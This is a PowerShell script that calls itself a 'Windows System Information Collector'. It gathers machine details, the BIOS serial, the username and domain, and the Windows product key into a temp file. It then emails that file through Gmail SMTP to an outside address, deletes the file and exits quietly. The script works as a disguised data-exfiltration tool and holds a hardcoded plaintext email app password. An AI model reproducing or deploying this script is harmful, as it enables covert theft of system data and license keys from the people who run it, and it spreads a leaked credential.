<#
Windows System Information Collector
#>

# Get system information
$computerSystem = Get-WmiObject Win32_ComputerSystem
$operatingSystem = Get-WmiObject Win32_OperatingSystem
$bios = Get-WmiObject Win32_BIOS
$processor = Get-WmiObject Win32_Processor | Select-Object -First 1

# Try to get product key
try {
    $productInfo = Get-WmiObject -Class SoftwareLicensingService -ErrorAction Stop
    $productKey = $productInfo.OA3xOriginalProductKey
    $productDescription = $productInfo.OA3xOriginalProductKeyDescription
} catch {
    $productKey = "N/A"
    $productDescription = "Unable to retrieve"
}

# Create detailed report
$report = @"
============================================
WINDOWS SYSTEM INFORMATION REPORT
============================================

COMPUTER INFORMATION:
- Computer Name: $($computerSystem.Name)
- Manufacturer: $($computerSystem.Manufacturer)
- Model: $($computerSystem.Model)
- Total RAM: $([math]::Round($computerSystem.TotalPhysicalMemory/1GB, 2)) GB

OPERATING SYSTEM:
- OS Name: $($operatingSystem.Caption)
- Version: $($operatingSystem.Version)
- Build: $($operatingSystem.BuildNumber)
- Architecture: $($operatingSystem.OSArchitecture)
- Install Date: $([Management.ManagementDateTimeConverter]::ToDateTime($operatingSystem.InstallDate).ToString('dd.MM.yyyy'))

BIOS INFORMATION:
- BIOS Vendor: $($bios.Manufacturer)
- BIOS Version: $($bios.SMBIOSBIOSVersion)
- BIOS Serial: $($bios.SerialNumber)

PROCESSOR:
- Processor: $($processor.Name)
- Cores: $($processor.NumberOfCores)
- Threads: $($processor.NumberOfLogicalProcessors)
- Max Speed: $($processor.MaxClockSpeed) MHz

WINDOWS PRODUCT KEY:
- Key: $productKey
- Description: $productDescription

USER INFORMATION:
- Username: $env:USERNAME
- Domain: $env:USERDOMAIN
- Computer: $env:COMPUTERNAME
- Report Date: $(Get-Date -Format 'dd.MM.yyyy HH:mm:ss')

============================================
Report generated by SystemInfo Tool
============================================
"@

# Save to file
$outputFile = "$env:TEMP\system_info.txt"
$report | Out-File -FilePath $outputFile -Encoding UTF8

# Email settings
$smtp = "smtp.gmail.com"
$From = "harisoncane@gmail.com"
$To = "efeaslan1995@gmail.com"
$Subject = "System Info - $env:COMPUTERNAME"
$Body = "Complete system information report attached.

Generated on: $(Get-Date -Format 'dd.MM.yyyy HH:mm:ss')
System: $env:COMPUTERNAME ($env:USERNAME)"

# App password
$appPassword = "zdfeitrgdejhktrc"
$SecurePassword = ConvertTo-SecureString $appPassword -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential($From, $SecurePassword)

try {
    # Send email
    Send-MailMessage -From $From -To $To -Subject $Subject -Body $Body `
        -Attachments $outputFile -SmtpServer $smtp -Port 587 `
        -UseSsl -Credential $Credential -Encoding UTF8
    
    Write-Host "System information report sent!" -ForegroundColor Green
} catch {
    Write-Host "Email failed: $_" -ForegroundColor Red
}

# Cleanup
Remove-Item $outputFile -Force -ErrorAction SilentlyContinue

# Silent exit
exit 0